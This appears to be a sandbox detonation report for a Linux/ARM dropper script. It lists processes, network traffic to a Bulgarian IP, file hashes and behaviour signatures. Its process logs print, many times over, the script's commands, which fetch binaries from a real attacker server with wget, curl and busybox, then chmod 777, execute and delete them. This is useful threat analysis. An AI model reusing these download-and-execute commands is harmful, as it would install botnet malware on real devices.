[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 89.187.167.39:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 01:30
Reported
2024-10-21 01:32
Platform
debian9-armhf-20240418-en
Max time kernel
34s
Max time network
35s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
Processes
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
